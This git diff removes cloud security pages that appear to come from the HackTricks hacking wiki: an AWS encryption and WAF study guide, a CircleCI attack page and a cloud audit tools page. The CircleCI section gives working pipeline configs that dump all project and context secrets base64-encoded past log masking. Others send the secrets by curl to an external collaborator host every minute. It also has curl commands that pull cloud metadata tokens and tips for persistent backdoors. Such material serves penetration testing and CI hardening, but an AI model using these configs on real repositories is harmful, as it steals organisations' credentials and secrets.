-# RDS - Relational Database Service
-
-RDS allows you to set up a **relational database** using a number of **different engines** such as MySQL, Oracle, SQL Server, etc. During the creation of your RDS database instance, you have the opportunity to **Enable Encryption at the Configure Advanced Settings** screen under Database Options and Enable Encryption.
-
-By enabling your encryption here, you are enabling **encryption at rest for your storage, snapshots, read replicas and your back-ups**. Keys to manage this encryption can be issued by using **KMS**. It's not possible to add this level of encryption after your database has been created. **It has to be done during its creation**.
-
-However, there is a **workaround allowing you to encrypt an unencrypted database as follows**. You can create a snapshot of your unencrypted database, create an encrypted copy of that snapshot, use that encrypted snapshot to create a new database, and then, finally, your database would then be encrypted.
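-
-A minimal sketch of that snapshot-copy workaround (the identifiers and key alias are hypothetical):
-
-```bash
-# 1. Snapshot the unencrypted instance
-aws rds create-db-snapshot --db-instance-identifier mydb \
-    --db-snapshot-identifier mydb-snap
-
-# 2. Copy the snapshot, encrypting the copy with KMS
-aws rds copy-db-snapshot --source-db-snapshot-identifier mydb-snap \
-    --target-db-snapshot-identifier mydb-snap-encrypted \
-    --kms-key-id alias/my-rds-key
-
-# 3. Restore a new, encrypted instance from the encrypted copy
-aws rds restore-db-instance-from-db-snapshot \
-    --db-instance-identifier mydb-encrypted \
-    --db-snapshot-identifier mydb-snap-encrypted
-```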
-
-Amazon RDS **sends data to CloudWatch every minute by default.**
-
-In addition to encryption offered by RDS itself at the application level, there are **additional platform-level encryption mechanisms** that could be used for protecting data at rest, including **Oracle and SQL Server Transparent Data Encryption**, known as TDE, which could be used in conjunction with the method already discussed but would **impact the performance** of the database. Other options are MySQL cryptographic functions and Microsoft Transact-SQL cryptographic functions.
-
-If you want to use the TDE method, then you must first ensure that the database is associated to an option group. Option groups provide default settings for your database and help with management which includes some security features. However, option groups only exist for the following database engines and versions.
-
-Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes, firstly, TDE tablespace encryption which encrypts entire tables and, secondly, TDE column encryption which just encrypts individual elements of the database.
-
-# Amazon Kinesis Firehose
-
-Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data, such as S3, Redshift and Amazon Elasticsearch.
-
-The service is fully managed by AWS, taking a lot of the administration and maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination.
-
-Amazon Streams essentially collects and processes huge amounts of data in real time and makes it available for consumption.
-
-This data can come from a variety of different sources, for example, log data from the infrastructure, social media, web clickstream feeds, market data, etc. Now that we have a high-level overview of each of these, we need to understand how they implement encryption of any data processed and stored, should it be required.
-
-When clients are **sending data to Kinesis in transit**, the data can be sent over **HTTPS**, which is HTTP with SSL/TLS encryption. However, once it enters the Kinesis service, it is unencrypted by default. Using both **Kinesis Streams and Firehose encryption, you can ensure your streams remain encrypted up until the data is sent to its final destination**, as **Amazon Kinesis Streams** now has the ability to implement SSE encryption using KMS to **encrypt data as it enters the stream** directly from the producers.
-
-If Amazon **S3** is used as a **destination**, Firehose can implement encryption using **SSE-KMS on S3**.
-
-As a part of this process, it's important to ensure that both producer and consumer applications have permissions to use the KMS key. Otherwise encryption and decryption will not be possible, and you will receive an unauthorized KMS master key permission error.
-
-Kinesis SSE encryption will typically call upon KMS to **generate a new data key every five minutes**. So, if you had your stream running for a month or more, thousands of data keys would be generated within this time frame.
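-
-A minimal sketch of turning on SSE for an existing stream (the stream name is a placeholder; the AWS-managed Kinesis key is used here):
-
-```bash
-# Enable server-side encryption with KMS on a Kinesis data stream
-aws kinesis start-stream-encryption \
-    --stream-name my-stream \
-    --encryption-type KMS \
-    --key-id alias/aws/kinesis
-```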
-
-# Amazon Redshift
-
-Redshift is a fully managed service that can scale up to over a petabyte in size, which is used as a **data warehouse for big data solutions**. Using Redshift clusters, you are able to run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gather greater understanding of vision for your business.
-
-**Redshift offers encryption at rest using a four-tiered hierarchy of encryption keys using either KMS or CloudHSM to manage the top tier of keys**. **When encryption is enabled for your cluster, it can't be disabled, and vice versa**: when you have an unencrypted cluster, it can't be encrypted.
-
-Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering level of encryption keys are as follows, **tier one is the master key, tier two is the cluster encryption key, the CEK, tier three, the database encryption key, the DEK, and finally tier four, the data encryption keys themselves**.
-
-## KMS
-
-During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective.
-
-The default KMS key for Redshift is automatically created by Redshift the first time the key option is selected and used, and it is fully managed by AWS. This CMK is known as the master key, tier one, and once selected, Redshift can enforce the encryption process as follows: Redshift will send a request to KMS for a new KMS key.
-
-This KMS key is then encrypted with the CMK master key, tier one. This encrypted KMS data key is then used as the cluster encryption key, the CEK, tier two. This CEK is then sent by KMS to Redshift where it is stored separately from the cluster. Redshift then sends this encrypted CEK to the cluster over a secure channel where it is stored in memory.
-
-Redshift then requests KMS to decrypt the CEK, tier two. This decrypted CEK is then also stored in memory. Redshift then creates a random database encryption key, the DEK, tier three, and loads that into the memory of the cluster. The decrypted CEK in memory then encrypts the DEK, which is also stored in memory.
-
-This encrypted DEK is then sent over a secure channel and stored in Redshift separately from the cluster. Both the CEK and the DEK are now stored in memory of the cluster both in an encrypted and decrypted form. The decrypted DEK is then used to encrypt data keys, tier four, that are randomly generated by Redshift for each data block in the database.
-
-You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3.
-
-## CloudHSM
-
-When working with CloudHSM to perform your encryption, firstly you must set up a trusted connection between your HSM client and Redshift while using client and server certificates.
-
-This connection is required to provide secure communications, allowing encryption keys to be sent between your HSM client and your Redshift clusters. Using a randomly generated private and public key pair, Redshift creates a public client certificate, which is encrypted and stored by Redshift. This must be downloaded and registered to your HSM client, and assigned to the correct HSM partition.
-
-You must then configure Redshift with the following details of your HSM client: the HSM IP address, the HSM partition name, the HSM partition password, and the public HSM server certificate, which is encrypted by CloudHSM using an internal master key. Once this information has been provided, Redshift will confirm and verify that it can connect and access the HSM partition.
-
-If your internal security policies or governance controls dictate that you must apply key rotation, then this is possible with Redshift enabling you to rotate encryption keys for encrypted clusters, however, you do need to be aware that during the key rotation process, it will make a cluster unavailable for a very short period of time, and so it's best to only rotate keys as and when you need to, or if you feel they may have been compromised.
-
-During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed when the status will return to 'available'.
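-
-A minimal sketch of triggering that rotation (the cluster identifier is a placeholder):
-
-```bash
-# Rotates the CEK for the cluster and its snapshots; the cluster briefly enters 'rotating keys'
-aws redshift rotate-encryption-key --cluster-identifier my-cluster
-```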
-
-# WAF
-
-AWS WAF is a web application firewall that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create security rules that block common attack patterns, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define.
-
-There are a number of essential components relating to WAF, these being: Conditions, Rules and Web Access Control Lists, also known as Web ACLs.
-
-## Conditions
-
-Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to be monitoring** (XSS, GEO (filtering by location), IP addresses, size constraints, SQL injection attacks, strings and regex matching). Note that if you are restricting a country from CloudFront, this request won't arrive to the WAF.
-
-You can have **100 conditions of each type**, such as Geo Match or size constraints; however, **Regex** is the **exception** to this rule, where **only 10 Regex** conditions are allowed, but this limit can be increased. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based rules** per account. Finally, you can have **10,000 requests per second** when **using WAF** within your application load balancer.
-
-## Rules
-
-Using these conditions you can create rules: For example, block request if 2 conditions are met.\
-When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**.
-
-The only **difference** between a rate-based rule and a regular rule is that **rate-based** rules **count** the **number** of **requests** that are being received from a particular IP address over a time period of **five minutes**.
-
-When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five-minute time frame**. When the count limit is **reached**, **all other requests from that same IP address are then blocked**. If the request rate falls back below the rate limit specified, the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule. A minimal sketch of creating such a rule follows.
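-
-A sketch using the classic WAF API (the names are hypothetical; each mutating call needs a fresh change token):
-
-```bash
-# Rate-based rule blocking IPs that exceed 2000 requests per 5 minutes
-CHANGE_TOKEN=$(aws waf get-change-token --query ChangeToken --output text)
-aws waf create-rate-based-rule \
-    --name IPRateLimit \
-    --metric-name IPRateLimit \
-    --rate-key IP \
-    --rate-limit 2000 \
-    --change-token "$CHANGE_TOKEN"
-```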
-
-## Actions
-
-An action is applied to each rule, these actions can either be **Allow**, **Block** or **Count**.
-
-* When a request is **allowed**, it is **forwarded** onto the relevant CloudFront distribution or Application Load Balancer.
-* When a request is **blocked**, the request is **terminated** there and no further processing of that request is taken.
-* A **Count** action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block.
-
-If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown:
-
-1. Whitelisted IPs as Allow.
-2. Blacklisted IPs as Block.
-3. Any bad signatures also as Block.
-
-## CloudWatch
-
-WAF CloudWatch metrics are reported **in one minute intervals by default** and are kept for a two week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests.
-
-# AWS Firewall Manager
-
-AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources.
-
-It can **group and protect specific resources together**, for example, all resources with a particular tag or all of your CloudFront distributions. One key benefit of Firewall Manager is that it **automatically protects certain resources that are added** to your account as they become active.
-
-**Requisites**: Create a Firewall Manager master account, set up an AWS Organization with the member accounts added, and enable AWS Config.
-
-A **rule group** (a set of WAF rules together) can be added to an AWS Firewall Manager Policy, which is then associated to AWS resources, such as your CloudFront distributions or application load balancers.
-
-**Firewall Manager policies only allow "Block" or "Count"** options for a rule group (no "Allow" option).
-
-# AWS Shield
-
-AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS.
-
-**AWS Shield Standard** is **free** to everyone, and it offers DDoS **protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53.
-
-**AWS Shield Advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection for your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to Standard. You will also have **access to a 24/7 specialized DDoS response team at AWS, known as the DRT**.
-
-Whereas the Standard version of Shield offered protection against layer three and layer four, **Advanced also offers protection against layer seven, application, attacks.**
-
-# VPN
-
-## Site-to-Site VPN
-
-**Connect your on-premises network with your VPC.**
-
-### Concepts
-
-* **VPN connection**: A secure connection between your on-premises equipment and your VPCs.
-* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS.
-
- Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability.
-* **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device.
-* **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection.
-* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
-* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
-
-### Limitations
-
-* IPv6 traffic is not supported for VPN connections on a virtual private gateway.
-* An AWS VPN connection does not support Path MTU Discovery.
-
-In addition, take the following into consideration when you use Site-to-Site VPN.
-
-* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.
-
-## Components of Client VPN
-
-**Connect from your machine to your VPC**
-
-### Concepts
-
-* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
-* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
-* **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks.
-* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks.
-* **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session.
-* **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`.
-* **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443.
-* **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address.
-* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
-* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
-
-### Limitations
-
-* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.
-* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**
-* A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint.
-* The **client CIDR range cannot be changed** after you create the Client VPN endpoint.
-* The **subnets** associated with a Client VPN endpoint **must be in the same VPC**.
-* You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**.
-* A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**.
-* Client VPN supports **IPv4** traffic only.
-* Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**.
-* If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format:
-
- ```
- SCRV1:<base64_encoded_string>:<base64_encoded_string>
- ```
-* The self-service portal is **not available for clients that authenticate using mutual authentication**.
-
-# Amazon Cognito
-
-Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple.
-
-The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together.
-
-## **User pools**
-
-A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
-
-User pools provide:
-
-* Sign-up and sign-in services.
-* A built-in, customizable web UI to sign in users.
-* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool.
-* User directory management and user profiles.
-* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification.
-* Customized workflows and user migration through AWS Lambda triggers.
-
-## **Identity pools**
-
-With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools:
-
-* Amazon Cognito user pools
-* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple
-* OpenID Connect (OIDC) providers
-* SAML identity providers
-* Developer authenticated identities
-
-To save user profile information, your identity pool needs to be integrated with a user pool.
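-
-A minimal sketch of the guest (unauthenticated) identity pool flow, which exchanges an identity for temporary AWS credentials (the pool ID is a hypothetical placeholder):
-
-```bash
-# Obtain an identity from the pool, then trade it for temporary credentials
-ID=$(aws cognito-identity get-id \
-    --identity-pool-id us-east-1:11111111-2222-3333-4444-555555555555 \
-    --query IdentityId --output text)
-aws cognito-identity get-credentials-for-identity --identity-id "$ID"
-```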
-
-
-
-
-
-
-
-
diff --git a/cloud-security/circleci.md b/cloud-security/circleci.md
deleted file mode 100644
index d26f49b75..000000000
--- a/cloud-security/circleci.md
+++ /dev/null
@@ -1,291 +0,0 @@
-# CircleCI
-
-
-
-
-
-
-## Basic Information
-
-[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuous Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch**, for example.
-
-## Permissions
-
-**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
-In my testing I verified that as long as you have **write permissions over the repo in github**, you are able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
-
-However, you need to be a **repo admin** in order to **convert the repo into a CircleCI project**.
-
-## Env Variables & Secrets
-
-According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
-
-### Built-in env variables
-
-Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
-
-### Clear text
-
-You can declare them in clear text inside a **command**:
-
-```yaml
-- run:
- name: "set and echo"
- command: |
- SECRET="A secret"
- echo $SECRET
-```
-
-You can declare them in clear text inside the **run environment**:
-
-```yaml
-- run:
- name: "set and echo"
- command: echo $SECRET
- environment:
- SECRET: A secret
-```
-
-You can declare them in clear text inside the **build-job environment**:
-
-```yaml
-jobs:
- build-job:
- docker:
- - image: cimg/base:2020.01
- environment:
- SECRET: A secret
-```
-
-You can declare them in clear text inside the **environment of a container**:
-
-```yaml
-jobs:
-  build-job:
-    docker:
-      - image: cimg/base:2020.01
-        environment:
-          SECRET: A secret
-```
-
-### Project Secrets
-
-These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
-You can see them **declared in** _https://app.circleci.com/settings/project/github/\<org>/\<repo>/environment-variables_
-
-![](<../.gitbook/assets/image (662) (1) (1).png>)
-
-{% hint style="danger" %}
-The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
-{% endhint %}
-
-### Context Secrets
-
-These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
-
-![](<../.gitbook/assets/image (661).png>)
-
-{% hint style="success" %}
-However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\
-This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
-{% endhint %}
-
-## Attacks
-
-### Search Clear Text Secrets
-
-If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
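-
-A minimal sketch, assuming the org's repos are already cloned locally (the path and regex are illustrative):
-
-```bash
-# Grep every remote branch's CircleCI config in each local repo mirror
-for repo in ./org-repos/*/; do
-  for ref in $(git -C "$repo" for-each-ref --format='%(refname:short)' refs/remotes); do
-    git -C "$repo" grep -inE "(password|secret|token|key)" "$ref" -- .circleci/config.yml
-  done
-done
-```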
-
-### Secret Env Vars & Context enumeration
-
-Checking the code you can find **all the secret names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\<org>/contexts_.
-
-### Exfiltrate Project secrets
-
-{% hint style="warning" %}
-In order to **exfiltrate ALL** the project and context **SECRETS** you **only** need **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts, but by default everyone can access every context_).
-{% endhint %}
-
-{% hint style="danger" %}
-The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**.
-{% endhint %}
-
-All the project secrets are always set in the env of the jobs, so just calling `env` and encoding the output in base64 (which also avoids the log's secret masking) will exfiltrate the secrets in the **workflow's web log console**:
-
-```yaml
-version: 2.1
-
-jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "env | base64"
-
-workflows:
- exfil-env-workflow:
- jobs:
- - exfil-env
-```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
-```yaml
-version: 2.1
-
-jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
-
-# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
-workflows:
- exfil-env-workflow:
- triggers:
- - schedule:
- cron: "* * * * *"
- filters:
- branches:
- only:
- - circleci-project-setup
- jobs:
- - exfil-env
-```
-
-### Exfiltrate Context Secrets
-
-You need to **specify the context name** (this will also exfiltrate the project secrets):
-
-
-```yaml
-version: 2.1
-
-jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "env | base64"
-
-workflows:
- exfil-env-workflow:
- jobs:
- - exfil-env:
- context: Test-Context
-```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
-```yaml
-version: 2.1
-
-jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
-
-# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
-workflows:
- exfil-env-workflow:
- triggers:
- - schedule:
- cron: "* * * * *"
- filters:
- branches:
- only:
- - circleci-project-setup
- jobs:
- - exfil-env:
- context: Test-Context
-```
-
-{% hint style="warning" %}
-Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a CircleCI build**. You need to **enable it as a project in the CircleCI console**.
-{% endhint %}
-
-### Escape to Cloud
-
-**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
-By default their machines are located in GCP, and you initially won't be able to **find** anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
-
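-A sketch of what such a task could run to query the metadata endpoints (these are the standard GCP/AWS endpoints; the output would still need to be exfiltrated as shown above):
-
-```bash
-# GCP (GCE) metadata - dumps a service account token
-curl -s -H "Metadata-Flavor: Google" "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"
-# AWS (IMDSv1) - lists the instance role names
-curl -s "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
-```
-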
-Notice that in the previous examples everything was launched inside a docker container, but you can also **ask to launch a VM** (which may have different cloud permissions):
-
-```yaml
-jobs:
- exfil-env:
- #docker:
- # - image: cimg/base:stable
- machine:
- image: ubuntu-2004:current
-```
-
-Or even a docker container with access to a remote docker service:
-
-```yaml
-jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - setup_remote_docker:
- version: 19.03.13
-```
-
-### Persistence
-
-* It's possible to **create user tokens in CircleCI** to access the API endpoints with the user's access (see the API sketch after this list).
-  * _https://app.circleci.com/settings/user/tokens_
-* It's possible to **create project tokens** to access the project with the permissions given to the token.
-  * _https://app.circleci.com/settings/project/github/\<org>/\<repo>/api_
-* It's possible to **add SSH keys** to the projects.
-  * _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
-* It's possible to **create a cron job in a hidden branch** of an unexpected project that **leaks** all the **context env vars** every day.
-  * Or even create in a branch / modify a known job that will **leak** all context and **project secrets** every day.
-* If you are a github owner you can **allow unverified orbs** and configure one in a job as a **backdoor**
-* You can find a **command injection vulnerability** in some task and **inject commands** via a **secret**, modifying its value
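-
-A sketch of using such a token against the CircleCI v2 API (the token and project slug are placeholders):
-
-```bash
-# Identify the owner of the token
-curl -s -H "Circle-Token: <USER_TOKEN>" https://circleci.com/api/v2/me
-# List the pipelines of a project
-curl -s -H "Circle-Token: <USER_TOKEN>" "https://circleci.com/api/v2/project/gh/<org>/<repo>/pipeline"
-```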
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/cloud-security/cloud-security-review.md b/cloud-security/cloud-security-review.md
deleted file mode 100644
index 691e26fdf..000000000
--- a/cloud-security/cloud-security-review.md
+++ /dev/null
@@ -1,149 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-**Check for nice cloud hacking tricks in** [**https://hackingthe.cloud**](https://hackingthe.cloud)
-
-# Generic tools
-
-There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section.
-
-## [ScoutSuite](https://github.com/nccgroup/ScoutSuite)
-
-AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
-
-```
-pip3 install scoutsuite
-```
-
-## [cs-suite](https://github.com/SecurityFTW/cs-suite)
-
-AWS, GCP, Azure, DigitalOcean
-
-```
-git clone https://github.com/SecurityFTW/cs-suite.git && cd cs-suite/
-pip install virtualenv
-virtualenv -p python2.7 venv
-source venv/bin/activate
-pip install -r requirements.txt
-python cs.py --help
-```
-
-## Nessus
-
-Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**.
-
-## Common Sense
-
-Take a look at the **network access rules** and detect if the services are correctly protected:
-
-* Is SSH available from everywhere?
-* Are unencrypted services (telnet, http, ...) running?
-* Are there unprotected admin consoles?
-* In general, check that all services are correctly protected depending on their needs
-
-# Azure
-
-Access the portal here: [http://portal.azure.com/](http://portal.azure.com)\
-To start the tests you should have access with a user with **Reader permissions over the subscription** and the **Global Reader role in AzureAD**. If even then you are **not able to access the content of the Storage accounts**, you can fix it with the role **Storage Account Contributor**.
-
-It is recommended to **install azure-cli** on **Linux** and **Windows** virtual machines (to be able to run PowerShell and Python scripts): [https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest)\
-Then, run `az login` to log in. Note that the **account information** and **token** will be **saved** inside _~/.azure_ (in both Windows and Linux).
-
-Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the azure portal. Go to _Policy & Compliance -> Regulatory Compliance_ (or try to access [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22)).\
